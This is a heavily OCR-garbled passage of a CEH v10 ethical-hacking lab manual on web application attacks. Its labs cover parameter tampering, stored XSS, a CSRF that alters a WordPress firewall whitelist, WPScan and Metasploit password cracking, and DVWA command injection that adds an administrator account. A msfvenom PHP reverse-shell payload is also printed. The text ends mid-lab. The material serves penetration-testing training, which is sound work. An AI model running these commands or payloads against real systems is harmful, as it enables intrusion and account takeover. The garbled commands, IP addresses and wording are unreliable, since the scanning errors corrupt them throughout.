CEH Lab Manual Hacking Web Applications Module 14rate F ronson wage Bi werennine ED Wontar © Tools “demonstrated in ace. ‘Toole CEHvI0 Module 14 Hacking Wb ‘Applications En La Ma ac odie 14. aching web Appeatins Hacking Web Applications Hacking arb applications refers to gaining unauborized acass to a website or is associated data. Lab Scenario web application isa sofewate application running on a web browser that allows a ‘web user to submit and rtieve dita to and from a database over the Lternet or an jnwane. The term isa sometimes used wo refer to a computer software spplcaion, coded in browser supported programming language (uch as JavaScript, combined ‘with abrowser tendered markup language like HTMI), andreliant ona common web ‘browser to render the application executable, Web applications are popular because of the ubiquity of web browsers and the convenience of using them as a clon, "The abliry m update and miotsin web applications withoxt ditrbating and installing software on potential thousands of cient computers isa ey reason for their popularity, as isthe inherent sxppore for ‘croseplitform compatibility. Common web applications indade webmal,oninc rel le, oline auctions, wikis, and many others. With the wide adopdon of web applications ay a costeffecive channel for commanication and information ‘exchange, they have ako become # major stack vector for gaining acces 10 ‘onganiztions? information systems. Web applicaon hacking i the exploitation of applications vin HITTP, by manipalaing the application logics via an aplication’ ‘graphical web intriice, ramping with she Uniform Resouree Identifier (URD) ot THITTP dements not contained in the URI. Methods for hacking web application ae SQL. injection aacks, e206 seriping (XSS), cross site request forges (CSR), insecure communications, and others Inthe st module, you acted as an asacker an asessed the security of a web sewer platform. Now, you will move to the next, and most important, sage of seauiy assessmcat As un expert Ethical Hacker and Pea Tester, jou neal 10 fist est web applicaions for cos-site scipting vuluenbilies, cookie hijacking, command Injection atacs, and then scare web applications from such stacks. The labsin this ‘module wll give you hands-on experience of various web application auacks to help yom audit web application secu in your onpanization. Lab Objectives “The objecive of this lab i to provide expert koowledge of web application vulnerabilities and attacks, such as: ‘+ Parameter tampering. 1 Cross Site Sesiping (X88) + Stored X88 Username and Password Enumeration ‘+ Exploiting WordPress Phigin Vulnerabilities 1+ Exploiting Remote Command Execution Vulnerability "ie tian Gone Cah © Em iiipestecrel Rpmdete sch PotsModule 14- acing tb Applcations Web Application Auditing Framework *Webxite Vioerablity Seanning Lab Environment ‘Tocary out this a, you will eed: A computer runing Windows Server 2016 Windows Server 2012 running a a viral machine Windows 10 manning a 2 vial machine ‘+ KaliTJeus manning esa viral machine + A webbrowser with an Insemet connection Lab Duration “Time: 100 Minutes Overview of Web Application {Web apicons provide an ine beeen ce wes aed web vers hugh @ ‘set of web pages generated at the server end or that contain seript code to be executed jeanialy ina hem Web owe Lab Tasks Recommended labs att youin web application ae: 1 Taping Parameter Tampering and X88 Voloeabiies in Web ‘Applcaions + Pesnming Gron-ite Request Forgery (CSR) Atak * Bnumersting snd Hacking a Web Application using WPSean and Metasplott + Explting Remote Command Execution Vulrcrsiliy to Compromise a "Target Web Server 1 aploing Fle Uptond Vulnrbty at Difrnt Sout Levels * Website Vulnerability Scanning using Acunetix WVS- Racing Web Application Framework wing Weg Lab Analysis -Acajze and document he results rated to this ab exer Provide your opinion of your tae secu posture and expos. TALK TO YOUR INSTRUCTOR IP YOU HAVE QUESTIONS “Galea ht —~~S~S”S*~*~*”*”S*S*CR gd Gece Ca ym Taiko lepacon eS eae2 vaubie tony Lele GD wate eve Maula 14- Hacking Vis Appetions Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications ‘Thangh web appbiionseiree crain ety pois, ty ar swberable to atacks sch as SOL ination, crt siting, ad win icing. Lab Scenario According w OWASP, the web panmeter umpering stuck refers 1 the ‘manipulation of parameters exchanged between cient and server to mosily pplication dia, such se wer credentials and permissions, the price and quantity of products, nso on Usually, this information is stored in cookies, hidden form feds, fof URL. quay stings, and is used to increase application faesonaly and control, CCrosssite seripting allows an atacker to embed malicious JavaScript, VBScript, AaiveX, HTM, or Fash into a vulnerable dynamic page to trick the user into executing the script, so thatthe attacker ean gather data "Though implementing a sic application secuty uti, parameters, ad input ‘validation can minimize parameter tampering and XSS vulerabliis, many websites 1nd web applications are sill valemable to these security thre Aditing web applications for parameter tampering and XSS is one ofthe fis steps an atcker tales in atempting to compromise a web application's securiy. As ant ‘exper Ethical Hacker and Pen Tester, youshould be aware ofthe different parameter ‘ampering and XSS methods that can be employed by an auucker t hack web applications. In thislsb, you wl len how to explot parameter tampering and XSS vulnersbities in web applications. Lab Objectives, "The objective of this la i mo help stadeets learn ow to test web applications for vulnerbiis. Inti ab, you wil performs Parameter tampering attacks Cross site scripting (KSS or CSS) “GHLSMinad Fac ——SSCS~*~*~*~*S*S*SCN mc Cah Mic Reel epsbesons Sad eae(sea ey ‘rein Seoceeeines ‘Modu 14 Hacking Wb Appiestons Lab Environment ‘Tocany out this ab, you will ea: 1+ MovieScope website configured during thelab etup 1 Windows Server 2016 suonig as website host nachine 1 Windows Server 2012 running as wei machine 4 Windows 10 running as attacker machine + Microsofe$Q Server 2017 1+ Avweb bowser wih an Intenet connection Lab Duration "Time: 15 Miowtes Overview of the Lab ‘This lb demonstrates how an acacker cin easily explic parameter ampesing and “SS attack to access protesed information and perform other malicious tas Lab Tasks (Web parameter tampering atacks involve the manipulation of parameters exchanged Dberweenaclien andl server to modify application data such a user eedentials and [permissions prices, and prodoct quantities, Tn this lab, the machine horting the websie is Windows Server 2016, so make sure the machine s running throughout the labs the machine wsed to perform the cross site seipsing atack isthe Widows 10 vietel machin. 1, Loginto the Windows 10 vrwal machine, 2, Launch a web browser (Chrome) type httprwww.moviescope.com in the ales bar, and press Enter. Mitel Raped nie eeMoto 14- Mocking Wino Apocaons 3, MovieScape home login page sppeurs as chown inthe screenshot, Assume that you ae a registred user on the website, and log, eto ic sig, the fellowingcredentis: Useename: jon Password: test 4. You are logged into the website, Click the View Profile tab at the right side ofthe page 5. You will be mice to the profile page, which displays the personal ingormation of tm (sr, you. SS” ee aDavdge 7. Now, try to change the parameter to te in the aes bar, and pres nto, 8. You gt the profle for sam without having wo perform any hacking techniques to explore dhe database, = orss? Crose-site Seripting attack Pca cping Module 4 Hachirg Wie Aeptions 9. Now, ty the partmete ide inthe ales bas, and peess Enter 10. You get the profi for kety. This way, you can atempt to change the id rutizer and bain user profil information. ore oO 1 This process of changing the WP valve and geting the result ie known at parameter tampering. Wob crose-sto seripting (KSS or CSS) stacis explit valnertilities in dynamically geoersted web pages. This enables malicious attckers 10 inject lt side scrips into web pages viewed by other users, 12, Now, click the Contacte tab Here you wil be performing XSS attack, aesfies = spieste wd ar retina ee ae Dee mnieoets icant Sao sheet ie Ser ere a Mode 4-Hachirg Wi Apter 13. "The Contacts page appcars; cater your name (or any tandem ame) a the Name fidld, enter the cross ste script in the Comment field nd cick Submit Commont GLAS Refer Cen 14, On this page, you are testing for cros-site scripting vulneabiiy. Now, _efiesh the page and cick Contacts tb again. As soon ac yo ck the tab, 2 ‘Pop-up appear on the page diplaying a mesage that You are hacked. 15, You have succesfully added 2 malllous serio in this page. he comment -with malicious lnk is stored on the server. 16, Loginto Windows Server 2012 vrwal mache surge 17, Lauocha web browse (Moatta Firefox), ype the URI. tpuiumw.moviescope.com in the addess bar, and press Enter. “Grits mad Pye tiih——~SCSC*S*S*S*S*SCSTSC Cas Cony | Bigiekecel ache ed eeMote 14 Hacking Wie Aeetins 18 MovieScope hoene/logia page appears. Assume tat you ase arcgitered user ‘of the website ae login to it sng the following erode ‘Username: steve Password: test ers Top enaiagsn 19, You ae logged em he wet legate sr Click the ontact ta Gita SSCSCS*«R ga GoceModule 14: Hang Web Aspens 20, As soon as yom dick the Contacts ta, the eis ste spt maning on the ‘backend sever is executed, and 2 pop-up appeas, stating, This webslte has been hacked. = GURL eat ten 2, Silay, whenever user attempts to vis the Contacts page the alert pops ‘ups socn a the web page is loaded, Lab Analysis ‘Aly ane docuent teresa oh ab exec, Provide you opinion of pret ceay prea expe, PLEASE TALK 70 YOUR INSTRUCTOR IF YOU HAVE QUESTIONS “Geittai Manali) —~—~S~S~SC*~*S*SCSTSSC ig Gani Ca “ifiieitewes posse nce sePo vatate F foes Lele Bi web cone CD wt ‘Gab Maal Pa "ie ang nd Gomme Cap Mode Hacking Web Aptis Performing Cross-Site Request Forgery (CSRF) Attack Crosr Site Request Pargry (CSRE) is a attack which enfores @ ser to rim sevkaown acts on & eb application in whic there currently led in Lab Scenario Acconng to OWASP, CSRF isan attack tha tricks the victim into submitsing a smalcious request It ishents the identi and priveges of the victim to perfor an undesired function on the victim's bebulf. For most sits, browser requests automatically include any credentials associated with these, such asthe user's sion cookie IP adress, Windows domain credentials and s0 forth, Therefore if the wer ‘surrey authenticated t the te, the site wil have no way to sings berween the forged request sent bythe victim and legitimate request sent by the victim. CCSRF attacks eget fancionaley dha eases a state change on che server, soc. 3s changing the vitim's email adress or password, ot purchasing something. Forcing. ‘he viet to teieve dats doesnt benefit an attacker because the attacker doeslt receive the respons, the victim does. As such, CSRF atacks target state changing requests. ts somedimes posible to store the CSRF attack on the vulnerable ste ts. Such vulncralities ae called "stored CSRP favs", This ean be acoomplishes by simply Storingan IMG o IFRAME tag fd that accepts HMI, o by a more complex cross site sxiping attack. dean can storea CSRF attack in dhe st, te severity fof the stack amplified. In parla, the tkelihod is increased becaase the victim. 's more ely to view the page containing the atack than some random page on the Intemet "The Henood is alo increaeed becuse the vicim is aureto be suthenscated to the ste already, eee “iat inane pies onesModul 4 Mackng Web Appeatine Lab Objectives “The objective of this eb isto help students learn how to test web applications for ‘voles. Tnthisleb, you will performs 7 1 Performing CSRE attack demonstratedin Lab Environment this lab are available "Tocazy outthis lab, you will nea it. Kali Linux Machine at an azacker Module 14 Windows Server 2012. viein Hacking Web 7 seplicatons Lab Duration ‘Time: 10 Minutes Overview of the Lab CCSRF stacks specially target sate changing requests, no theft of da, since the attacker as 00 way 9 See the response to the forged request. With a litle hep of socal engineering (ach as sending a link via ema or cht) an attcer may tric the users of a web application into executing actions of the attackers choosing, Ifthe ‘itm is 2 normal user, a suceessul CSRE attack can force the usr to pefoem sate changing requests like transfering fonds, changing tht ail adres, and so forth. fd wet is an administrative acconot, CSRF can compromise te entre web application, Lab Tasks maT 1, Loginto the Windows Server 2042 viral machine. Login to 2 Taunch a browser, inthis kb we ae using chrome browser, To lauoch eae chrome browser, double-click Geogle Chrome shortxt con on the desktop. Note: Ifyou are using different browse then sceenshoss wil dle. 3. Type metpui0.t0.s0.1280801CEHweoginphp? in the address bor and res Enter, 4. CEH Demo Website page appears as shown in the screenshot “Gatttai tea gsi®—~S~S~*~*S*SCSCSTSC gai re ya iRibe noel epackons dy eetedule 14- Hacking Wo Asictons 5. "Type the foloing credentials nd click Log in as shown in the screenshot Username admin 1b, Password qwertyo123 ‘Assume that you have insaled and configured Firewall plugin for this se, sa here you wanted to check with the security configurations. Hover your mouse cursor cn Plugins and click ital Plugins 2s shown ras NedModule 14-ockng Web Aplatons 8. Inthe Pugin pape observe that Wordpress Firewall 2s ins, To view ‘cnfiguations lick Settings as shown in the sereensho Senate 9. Scroll down othe Whitelistod IPs secon, and chserve that 1090.40.42 1P i listed in the Whitcsted IPs list, which i the IP address of the Windows Serves 2012 where the CEH Wordpress website hosed. 10, Leave the logged in session runing. Do not logout for the admin session ofthe wordpress sie. 11, Login to Kal Lin machine with Username: reet and Password toot 12, Assume that atacker is performing enumeration on the CEH. wordpress ‘website to idenly dhe wulperable pugs, 13, Taunch a Terminal and «ype wpecam -u httpiM0.10.40.12:80800CEM ‘enumerate vp aid press Enter, “GHGS NeaST—SSCS*S*~*«C iModus 14- Hocking We Apicatons 114. If Do you want to update now? prompé appears type Nand press Enter. 15, wean stars to enumerating the vulnerable installed plogins in the CEE ‘wordpress 16, "This process wil tke approximately 6 minutes to complete the scan 17, Once the WPScan comptes the san, adi its ut the vulnerable plugios presen in the site as shown in the screenshot.Mode 14 Mackrg Wc Apieations 18, In this lb we are going wo perform ESRF aac using WordPress Firewall 19, Make a now ofthe teeation where the plugin sins, Minimize o dose the terminal windowMott 6 Hachng Vib Aptetons 20, Open anew text document, sed ype the following scien the document as shown inthe screenshot. Brasx = “ CCEHv10 Module 14 Hacking Web Applications (shred neswork dive). 27. Switch to Windows Server 2012 machine and navigate to CEH-Toots > (CEHiv10 Module 14 Hacking Web Applications (shared network dive) and copy the Security Seriptntml fle nd paste iton the Desktop,Module 14- Hacking Wed Aspetiens 28 Rightclick Security Serpthtm! fie, hover your mouse cursor on Open ‘with and then cick Google Chrome 2s shown the sreenshoe. Note: You should use same browser tht se inthe step #5, 29, ‘The Security Seripthtml Sle opens upin the Chrome browser, along with «pop-up as shown inthe sereensbot, click OX to continueModo 14. Hacking vine Appleton: 31. As soonas you cick on Submit button, twill redirect you to the WordPress Firewall 2 configurations page. 32, Scroll down and observe in the Whitested IPs secon the IP address is ‘changed 1 10:40:1041 (Kali Linx) Lab Analysis ‘Acalyee document hems a tw this xe. Pov your opinion of poor tig cet pets and expos ee ‘Gta Maal PesModule 14- Hocking Web Apocatons Enumerating and Hacking a Web Application using WPScan and Metasploit WendPras sawed sofa ad cated managment ste (CMS) tha you can wt to cree a website or bbe, Lab Scenario WScan isa black-box WordPress vulnersility scanner It is «regular pat of most ‘ofthe penetaton testes aseeiment took. According to Web Technology Serj, WordPress is used by 60.4% ofall nown content management system websites, nd 22.8% ofall websites WPScan provides prst help in asessing the secur oF target ‘organizations with WordPress sts Lab Objectives “The objective of this ab is wo hp you ler how: 4 rumen User wing WPSean bk esfom dlaionry atack to cack pasewonts using Metepoit Lab Environment ‘To perform this lab, you will need: © A compute running, Windows Server 26 * Windows Serer 2012 numing vil machine 1 Kalix mooning as vital machine Lab Duration “Time: 10 Minutes CTT Maal Pas 1 Bia Hang nd Gomme Cri er ioens Reser ey PoModule 14 Hacking Vib Apoations Overview of the Lab This ab demonstates muliple stacks performed on a winerble php website (WordPress) ia an attempt to gain sensible information such as ueemames and passwords, Yor wil learn how to use WPScan tool to enumerate weerames on a WordPress website nd howto crack pasruonds by performing a cctonary stake sing an mf aneiary mode. Lab Tasks $$ __™. Gi start at he lower left comer of the screen, click the downward Birasn arrow, and click Wampserver64 to launch WampServer ‘Start WampSorver Server 2012 "GUMS: Su te Warner “Guitiabitanal Pmt —~—~SCS~*S*S*SCSCSC aga Ceca iy Em Binsin noel Risley WeeModule 14- Hocking Wo Apoatons 2. Log in wo dhe Mall Linux virtual machine Bran = 3. Launch a command line temminal, type the command wpsean ~urt Enumerate ipsIIP Addrens of Windows Server 2012}S080/CEH enumerate snd press Enter. [Note: In ths hb, she IP Address of Windows Server 2012 is 10.10.10.12, which may vary ia your lab environment 44. On emtering the command, you will be asked to update the database, Simply, press Enter wo avoid the updation Dstt nin 5. WPScan hegins to enumerate the uaemamos stored in the website's Gatabase, and displays thom as shown in the screenshot:Moo 14- Hacking Wb Appietions Bran 6. Now chat you have successfully obtained the uremames stored in the er Gatabase, you need t find their passwords ‘the Options in To obtain the passwords, you wil we an auxliary module named Awetinry Module wordpress login enum (i msfeonsole) and perform a dictionary attack ‘sing the Passwords. fie (in the Wordliats folder), which you copied to the roat folder in he previous module, 8. To use the wordpress login enum auslliayy module, you need 10 fest, launch msfeonsol, 9. However, you need to star the postgres smsfeonso vies before laxnching the 10. To stare postgresql sevice, type the command service postgresql start and press Enter. 11, Because you have started both the services, you shall now launch smsfeonsole, 12, To launch msfeonsole, type msfeonsoe and press Entor. 13, Now, you will use the wordpress login enum auxiliary module 14, Type uae auxliaryecannerhttnwerdpress login enum and pressModule 14- Mackng eb Appetions 15, This module ellows you to enumerte the 1ogin credentials, 16. "To know all the options, you ean configure ia this module, ype show options and press Entr 17. You can view alist of aptions that can be set fr this module, Because you want to obiain the password, you need to set the: 4 PASS FILE: In this option, ou will he setting the Passwords file using which; you wll be pesforming the diconary atack. 1b RHOSTS: In this option, you will he «ting the target machine Le, Windows Servor 2012 IP Address. © RPORT. In this option, you willbe sting the target machine port ie., Windows Server 2042 por. 4. TARGETURE In this option, you willbe setting the base path to the WordPress website ic, httpel(P Address of Windows Server 2012}.80800cEW. USERNAME: Io this option, yon will he setting the usemname that was cbsained inthe Step no. 5. 18, Type set PASS FILE rootWordlistePaseworda.tet and press Entor 10 sete containing the passwords 19, Type set RHOSTS [IP Addross of Windows Server 2012} acd press Enter to scr the target IP Adatess, 20, ‘Type wet RPORT 8080 snd press Enter to st the snget portMote 14- Mocking Web Appeatons 21, Type set TARGETURI https Address of Windows Server 2012} 80801CEH! and press Entat wo set the hase path to the WordPress ‘website 22, Type set USERNAME admin and press Enter to set the username as "Note: You mayissue any onc of the usernames that you have obtained dusing the enumeration process. In this ab dhe admin user is being issued 23, Now, allthe options have been successfully set. Type rum and press Enter to exteute the auxiliary modale onus Sl im24, The auxiliary modle hegins to bute force the login credentials by tying various passwords forthe given usemame admin, 25. Once the correc password associated with the username is found, the ‘module stops and displys the eracked password, as shown in the sereenshor 26, Now, use the obtsined username password combination wo log ino the ‘WordPress website.Moai 14 Hacong We Aspens 27. Launch the Firfox ESR ucb browser, "pe hetpuIP Address. of Windows Server 2012]:8080/CEMWwpogin.php in the adress bar, and lick Log in. eee Hotna ry Ninn Ses ta MONEE Wieiang = 28. You shouldbe able to succesfilly lo, imo the website, as shown in the screenshot: fe of name pete ne Hee Sey Nit es etn ND A Dashbowd Gab Mal Tied Haga Gomme Coa OO “Eien epcbenoes or eeeMode 4 Mocking We Appeals 29, Inthe same way, you can follow the stops 18-22 and crack other uses? passwords associated (by setting another usemame obteined during ‘enumeration; eg, “cebuser!”) 30, Thus, you have suceessflly enumerated the usernames ad eracked theie asswonds. Lab Analysis Analyze and document the reuls rat to this ab exercise. Prove your opinion ‘of your targets security posture and exposure. ASE TALK TO YOUR INSTRUCTOR I YOU HAVE QUESTIONS Dyes SNo ‘Platform Supported Classroom. Bitabs ‘Ga tak Maal Ps casing snd Cannes Cipro Oy Hm Minuit apmntons ety eneExploiting Remote Command Execution Vulnerability to Compromise a Target Web Server Danan Vadeerible Web App (DVWA) ira PHP/MySQL web aplieatio that is extremely euler Ts main goals are fo be nad for security profesional test ‘Beir skills and tos in algal ersronment, belp web devel understand beter the proces of scaring web aplatons and ai teackers stunt in teaching) barring eb apphtion ext ina cer00m emironmen. Lab Scenario ‘Web developers build web applications, keeping in mind al the scurry measures involved i doing 2, Any loopholes fcnd in the applications might allo atackers P vapne to exploit them, resuling in emote code execution, database extsction, and null: __semetimes even the comple takeover ofthe avers that host cern Thus,as¢ CEH, you peed to ensure that web applications are propery built and ate fre from vulnerabitis that ould lead wo SQI. injecion cross sesiting, and so 00 Lab Objectives “The objective ofthis lab iso help you lem how to exploit commandline execution valoerbiis Lab Environment ‘To perform this eb, you will need 1 Acompoter running Windows Server 2016 1 Windows Serer 2012 rennin as viral machine Windows 10 running as vial machine Web browsers BB veo ‘Ge Tab Mane ica Hating ad Gatos Coie "Epctowead upectoes saraModul 14- Hocking Ws Appleatons Lab Duration ‘ime: 20 Minenes Overview of the Lab This lb demonstates the explitation performed on commandline exccution vrulnersilsyfxind in DVWA. Here, you wil eam her to exact information of target machine, create user account, as administrative privileges to the created count and use that account to log into the eet machine Lab Tasks |. Click Start atthe lowerleft ofthe seen, click the downward arrow, then Brass click Wampserver64 to launch WampServer. Start WampServor in Windows Server 2042Mot 14- Hacking Wins Apocatons 2. Launch the Windows 10 viral machine from the VMware Workstation, snd log onto it 3. Launch any (here Chrome) browser, type the URL metpulP Address of Windows Server 2012}: 8080\dewa inthe address bar, and press Enter, [Note:The IP adress of windows Server 2012 in this ibis 10-10:10.12, which might vary in your lab envionment e-ryrream Ping a Machine {The DYWA login page appears; type the following credentials, then click Login: a Usemame: b, Password: abet23 “GiiNii RTT ——SSCS~*~*~*«R GinModule 14 Mackrg Web Appestions 5. gordonb’s page appears click Command Execution. coc Welcome to Damn Vulnerable Web App! 6. ‘The command exceution uit in DVWA allows you to ping a machine. 17. ‘Type the IP Adress of the Windows Server 2042 machine, snd cil submit to ping the machine Vulnerability: Command Injection Ping a device a ae oir beed leptons dr eteMode 1-Meching Wi Apis R._DVWA hes successfully pinged a machine, as showa inthe sreenshot ‘ao = | 9. Now try issuing a different command to check whether DVWA can 10, Tssue the command | nostname and click submit. Generally, hostname is. used wo probe the name of the target machine, “Guede —SSCSCS*~*S*S*SC* nd eC “ish inane pinot nesole 14- Hacking Vins Appcations 11, Because you have issued a command, instead of entering an IP addzess ‘fa machine, cheapplication returns an exo, as showin inthe screershor More information 12, This shows thatthe aplication is secure enough Biase 13, Now check the security seting of the web application. a BYWA Security inthe left pane. Security Settings More information "ial Hang an Canoes Capri Hom tyes toel Repent PeMode 14: Mackng Web Aspens 14, DYWA Security web page appears. Observe that the sceurty evel is Impossible. This security seuing was blocking you from executing ‘commands other than simply pinging a mache. nsdn eee ets LOUREA Vig te Sec Seg 15, Now, set he securiy level ofthe web application wo “tow” to exploit the ‘command execution vulnerability Here, your intention would be to show ‘that a weakly secured web application isthe prime focus of attackers, (0 ‘exploits vulorabiltis, 16, Selec: tow option ftom the deop down ls, snd click Submit, srt Je > 0 [Oweaanicne ‘peeretcmeaece generate FIGURE Caen Sa “Gitabiiees eT —SSSSCSCS*S*S*SCN gad eri a Tiss pesto Sy oaMode 14: Macking Wie Appeatins 17, You have configured weak security setting in DYWA. Now check if you ‘em execute any commands besides pinging a machine 18, Click Command Injection in the left pane. moi Je > ¢ [ommen ® sm | DVWA Security ® Sonim] Security Love Dine ‘The Command injection web page appears, type | hostname 2nd click Extract Host ets formation | vetin Gonn - More information Lab Maal "ied Hating ad Gramm Cap Magical Repent only Pee"Mule ¥4-Nocking We Aplatons 20, DYWA returns the name of the Windows Server 2012 machine, as shown in the screenshot fee 7 wi Vulnerability: Command Injection ae Ping a device ‘ ar (ae == te or formation 21, This infers that the command excention fed is ulnerabe, and you are able ro execute commands remordy. 22. Now, wy to exact more information regarding the Windows Server 2012 machine. 23, Type the command | whoam! and click submit Ping a dovies ‘More information ‘ica ating ond Goon Shige tenral peascens scrModule 14: Hang Web Aepeatiens 24, The application displays the waer, group, and privileges information for the ser curently logged onto the Server 2012 machine, as shown inthe sensi WB veeemeanscenmane 7 UZ) ome Vulnerability; Command Injection ir — ter rman on SS. Tirasx tr — 25:Now, view the processes running on the machine, Type | tasktist and ick nub List the Processes nwa) sone Vulnerability: Command Injection — Ping a device —_— ste (=) Cy Tai nig macnn aSMul 14- Hocking Vee Apicatons 26, Alist ofall the nunning processes is displayed, as inthe sereenshot Vulnerability: Command Injection Ping a device fur 27. Check if you can terminate a process. Choose « process (other than Neen ‘windows process; hex, frefoxis chosen), and note its process ID (PID), ‘Terminate a Process Mor normation ‘GaN ak Maa it Tile nding Orr Cap “igh inered pesos teMotte 14 Mackng We Aspens 28, Type | Task PID [Process 1D value of the desired process] F and cick stent 29, By issuing this command), you are forcefully (F) terminating the process 30, The process will be successfll terminated, as shown inthe sereenshot a ee + 1 UY) Vulnerability: Command Injection Ping a device — More information aa a Eimaaairt 31. To confiem tha the process has heen suecesfly terminated, issue the | ‘asklist command, Lit the Directory Structure, 32, Now, view thediteciny structure of the Windows Server 2012 machine, “Tifiieltawns posse scr esay — on stem (S———) ——_ = | ecteeinca catenin at —— — ae Modu 4 Macg Web Appleone 33. Type | in and click submit co view the fles and directories in Gx Vulnerability: Command Injection Ping 14. The directory strucsie of Windows Server 2042 is displayed, as in the screenshot ‘Vulnerability: Command Injection Hin 35, Inthe same way, you can issue command co view other directories 36, Now ry to bain information elated to the user accounts. aMott 14 Hacking Wie Aetins 37. "To view user account information, ype | net user and click submit, Vulnerability: Command Injection Ping a = a 38, DVWA obtains user acount information from Windows Server 2012 san list it, as shown in the screenshot: Vulnerability: Command Injection Ping a device Brrr 39. Now, useshe command execution vulnerability and atempt to adda user Sane account remotely User Accountode 14- Hacking nb Apptions 40, Here, yoo will create an account asmed Test. Type | net user Test Add and dick eubent, Vulnerability: Command Injection Ping device 41, Auseraccout is cteated on the name “Test.” View the new use account by issuing the command | net user OSC me Tiga anal Rpcactorssaty PeModule 14 Mackrg Web Aspetions 42. You will observe the newly created account, as shown in the following screenshot Ping a device 48. Now, view thenew aecouets information. Type net user Test sod clic submit Gina ema it gd em orDrasn ‘Assign Admin Pridloges tothe Module 6 Hacirg Wie Ape tions 44. "The Test aceount infomation appears. You can see that Teat is 2 standard user account and does nat have administrative privileges. 45, Now assign administrative privileges to the account. The reaton for granting administrative privileges to this account is to use this (admin) sccount to log into the Windows Server 2042 machine by = remote desktop connection and with administrator access 46. To grant administrative psivleges, ype [mat localgroup Administrators ‘Test ind a click eubent ALY) = Vulnerability: Command Injection = Ping a deviceMit 16: Hacking Wie Apstins AT. Now you have successfully granted admin privileges to the account Conf the new seing by issuing the command | net user Tost Ping a device = More information 48, Observe that Testis now an administator account ScMode 14 Mocking Web Appts 49, So, now log into the Windows Server 2012 machine's Test account, using Remote Desktop Consection 50. Display the Start mens, snd click Windows Accessories > Remote Desktop Connection. 51. The Remote Desktop Connection dialog box appears; enter the IP Address ofthe Windows Server 2012 (here, 0.40.40.12) machine in the Computor text eld nd click Connect. WB Remote Destep Connection - Remote Desktop Connection compte: (foro7074 Username: None spected Youve be shed orcedete whe you comet. ©) Stow OptoneEnter your credentials ‘These credentials willbe used to connect to 10.10.10.12. 53, The Remote Desktop Comection window appears; dick Yes to connect ‘o the emote computer. 7H Fete Detop Connecbon Theron cores causretbe amertcated to blr (Sovtyodeae thay ade poses. Geto ane [Gi Name nine cate fone ent compaer ‘WHOWAONPACEHoo cettone on —, dens A, Tecatfeatennatton ated cating sty Doyeu wont cme ages cee oon? (Cte ak pantrcrrctrstotha meter od [=] "IG 4 etait Des Cann ‘Gea Nana Pe ‘ia angi Cees Cp Oy HE “Hip teaweet penton seoModule 14- aching Web Aplatons 54, A remote desktop connection is successfully established, as shown in the screenshot Ba Server Manager Thus, you have made use of a command execution vulnerbiliy in a DYWA application hosted on a Windows Server 2012 machine, extracted infomation related to the machine, created an administrator account remotely, and logged ito it. 56, Now, you may discontinve the session and log out ofthe web application. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Pati) Dyes No Platform Supported, Fi Classroom Bitabs ‘CN Tab Waal P "eal eyed Gnas Cah Em> vautie PF tensor oll BA wérexnise D wonton view © roots ‘his nb are ‘mvailable in ace. ‘TookceHvI0 Module 14 Hacking Web ‘Applications, Motte 14 Machng Wes Appeatone Exploiting File Upload Vulnerability at Different Security Levels Dane Vabedble Web App (DVWA) ia PHP/MSSQL. wd appiaion that ‘is damm vulnerable, Lab Scenario ‘Web developers bid web applications, keepingin mind that all he security measures {volved in doing 20, Any loopholes found inthe applications might allow atacers to exploit them, resking in remoce nde exertion, database extsction, and sometimes even the compte takenvcr of the servers that hort them, As an expert Penetration ‘Tester, ju need to determine whether your website ie secure before hnackers download sensitive dat, commit acme using your website as lane pad, and endanger your business. Ths, as Certified Ethical Hacker (CEH), you need © ‘ensure that wes applications ae propedly built and are fre frem vulnerabilities that ould lead to SQI- injection, cose «ripting and s0 on. Concise reports entity ‘where web appiations need tobe fixed, thus enabling you to protect your busness From impending hacker attacks! Lab Objectives “The objective ofthis ab eto dp you undentand ane demons Fe pond ‘vulnerability ina web app. Lab Environment “oper this hb, ou wil nea A computer running Windows Server 2016 Kal Linux runing a virtual machine + Windows Server 2012 runing a vial machine © web bramer wih an Item connection "ial Maing Gace Ch Hm Mis Rowee pectone Sec attestFromvoror Molo 14 Mocking We Appatons Lab Duration “ime: 2 Mines Overview of Web Application Security ‘Web apition wet i mmc ofinfoemation sci tsp dels wih the acy of weit web apllesios el web i. Atahigh evel, Web application security drawson the principles of aplication secity ‘butapplies them spaccaly wo Teteret andl Web systems Typically, web apiicasons are developed using programming languyges such as PHP, Java EE, Java, Pthoo, Ruby, ASPNET, CH, VNET, or Cassie ASP, Lab Tasks Before starting this lab, male sure that Windows Server 2012 virtual machine is ‘turned on and WAMPServer is rncing 1, Launch Windows Server 2012 from VMware Workstation snd log isto the machine. 2 Once you have logged into the machine, navigate o Start and click Wampservers4. 3, This wil start che WAMPServor service on the Windows Server 2012 machin. 4, Leave the Windows Server 2012 nioing.Module 14- Hocking Woe Apieatone 5. Now, lauoch the Kall Linux vrtal machine fom VMware Workstation and log into the machine, “GallLab Maal Paste iia adnan Gansu Ce lyMot 14- Hacking Wins Apocatons 6 Open up 2 terminal window, ype mafvenom pphpimeterpreterreverse tep Ihout=10.10.40.11 inort=44ea raw anc) hit Enter. 7. The aw payload is generate in the terminal window. Slee the payload sand copy it by right clicking on it then choosing Capy option from the context menu, as shown in the sereenshor 8. Now open Leatpad snd paste the rw payload code, as shown in the screenshot. ial gd Geen oy Rtote 14: Hachng Wi Apo tions 9, Click Fite menu in the Menu bar and choose Sawe A. fom the mem. co) Tein 90{0); $39 = "10-18.20.21"; Sport = aude: a4 (St 00 Sereme | Fart ek iSEavtabe(ae)) (2 > SHAR TMET, Stick STREAM, batccaect| sa. Suny spore) fH (tSren) (seal ‘mmexen sence Utt'es type) ale( ao soenet tunes"): bP ¢ sb socket regtsiy Sten: strien 5 S6LOnAST negeeck| = f1y detoans( mepseck S90") = sade supose") ce int et fedisable evel’ T) { ssatosan bjpassnereate tunctioa ‘Ssunosin oypsss(bs } else C eett@o)e } Get LS eo 10, When Save As. vindow appears, give the payload fle a name (here ‘upload.php) and choose the location as Desktop, Then click Save and close all the windows that were open. ae Seite) PURE See CCE Tab Maru Pacts Cen Hacking Gooremear aren Conih ©y EO ame “Eerie yeeros Se oeMode 14: Macking Wich Appeatins Al, Launch Firefox ESR browser and enter the URL as ‘ntps710.40.10.12:0080idvwallogin.php. The login page eppears, enter the user credentials 2s adminjpassword and click Login. GLA STEW 12, Click DWA Security ia the left pane to view the DVWA seeusty level, Set the security level by scleting Law from the drop dow list and clic ‘the Submit button, as shown inthe sreenshot: “GilitarNima gli ing cmc Ca ‘itgis noel Resco etyduo 14- Mocking Vite Arplstons 13, 